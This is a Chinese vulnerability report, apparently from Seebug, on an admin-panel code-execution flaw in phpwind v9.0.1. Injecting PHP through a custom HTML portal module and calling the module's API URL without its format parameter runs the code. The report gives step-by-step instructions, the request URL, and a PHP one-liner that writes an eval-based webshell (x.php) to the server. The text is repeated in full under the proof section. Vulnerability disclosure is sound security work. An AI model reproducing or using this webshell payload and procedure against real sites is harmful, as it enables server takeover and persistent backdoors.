phpwind命令执行getshell（后台）

### 简要描述： 官网下载最新版 ### 详细说明： v9.0.1 搭建好，登陆 [<img src="https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png) 在门户里选择页面管理，新增模块。自定义html [<img src="https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png) 写入phpinfo,提交，然后调用代码 [<img src="https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png) 选择调用站外代，复制连接，访问 调用xml，json都可以。以xml为例， [<img src="https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png) http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml [<img src="https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png) 去掉xml，会执行phpinfo [<img src="https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png) 将代码换成 ``` <?php fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>");?> ``` 重新访问可getshell [<img src="https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png) ### 漏洞证明： v9.0.1 搭建好，登陆 [<img src="https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png) 在门户里选择页面管理，新增模块。自定义html [<img src="https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png) 写入phpinfo,提交，然后调用代码 [<img src="https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png) 选择调用站外代，复制连接，访问 调用xml，json都可以。以xml为例， [<img src="https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png) http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml [<img src="https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png) 去掉xml，会执行phpinfo [<img src="https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png) 将代码换成 ``` <?php fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>");?> ``` 重新访问可getshell [<img src="https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png)